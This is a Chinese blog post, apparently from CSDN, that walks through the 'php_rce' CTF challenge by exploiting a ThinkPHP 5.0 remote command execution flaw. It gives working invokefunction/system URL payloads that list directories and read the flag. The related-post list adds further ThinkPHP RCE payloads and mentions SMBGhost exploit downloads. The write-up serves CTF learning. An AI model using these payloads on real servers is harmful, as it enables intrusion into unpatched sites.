攻防世界web---php_rce

最新推荐文章于 2024-04-09 19:30:11 发布
最新推荐文章于 2024-04-09 19:30:11 发布
阅读量479 收藏 1
点赞数 1
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gongjingege/article/details/107225903
版权

php_rce

没有题目描述,直接打开链接
在这里插入图片描述看到这一脸懵,试了几种常用的方法,什么也没发现,于是从内容入手,百度一下thinkphp 5.0版本,发现这个版本存在远程执行命令的漏洞,对漏洞这方面不了解,网上查找一下这个版本的漏洞
漏洞链接

找到了payload
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
在这里插入图片描述没有发现flag,于是…/返回上一级目录/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/
多次返回后发现flag在这里插入图片描述用cat命令读取flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag
在这里插入图片描述发现flag

对漏洞方面不了解,还需要提升
文章参考链接:https://blog.csdn.net/xj28555/article/details/107162132/
2020.7.8 公瑾

gongjingege
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF攻防世界 php_rce 解题详析
等风来
05-22 5249
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
Thinkphp 5-rce 漏洞复现(vulhub)
MDSEC的博客
08-21 183
ThinkPHP其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。1.在虚拟机中拉去thinkphp 5-rce镜像。输出关于php的配置信息。执行命令 whoami。连接成功,说明存在漏洞。写入webshell。
thinkphp5远程代码执行漏洞分析(一)
weixin_30482383的博客
08-28 603
payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...
攻防世界php_rce (ThinkPHP5)
最新发布
2302_79800344的博客
04-09 615
【代码】【攻防世界php_rce (ThinkPHP5漏洞)
thinkphp5.*远程命令执行漏洞复现
weixin_42075643的博客
01-27 562
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B
thinkphp5漏洞几道例题
wo41ge的博客
11-14 222
漏洞 具体看这里 ThinkPHP5.0.23(远程命令执行) 例题[BJDCTF 2nd]old-hack index.php?s=1查看版本 POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag ThinkPHP V5.0.20(远程
php_rce(攻防世界lv.2)
qq_66013948的博客
10-25 291
可以看到当前目录内的文件,既然这样能够成功,那么我们就可以试着把退回根目录找有关flag的文件夹或者文件,最后在根目录上找的了个flag的文件夹,之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞,可以去。里面看有关漏洞的分析,通常构造的payload为。可以看到flag了。
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
fastjson_rce_tool-master.zip
05-14
个人亲试,好用的脚本文件
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 883
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
PHPRCE
m0_63045593的博客
04-22 932
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
攻防世界——php_rce
weixin_73942557的博客
10-16 194
在网上查找这个东西,发现有远程命令执行漏洞。利用已经构造好的payload直接上。看到了flag查看路径获取它。攻防世界——php_rce。使用whereis命令查找。
攻防世界】三 --- php_rce
qq_43168364的博客
12-23 423
题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞,可以找到一些 由于我们不知其具体的版本,随便找一个执行一下,这里选择第一个 会显出了root 说明thinkphp的版本可能就是:5.0.22,在选择下面的命令执行paylaod执行 可以执行命令 执行find命令查找flag相关文件 可以在根目录下找到flag文件 使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
NLXHBM的博客
04-16 2966
1.使用以下payload获取phpinfo: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 2.构造要执行的payload,获取网站目录文件: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&
thinkphp 5.x全版本任意代码执行
yuanfengfengyuan的博客
06-05 846
MSG ThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,从而被 GetShell。 POC 反斜杠解析成类造成命令执行 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\...
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值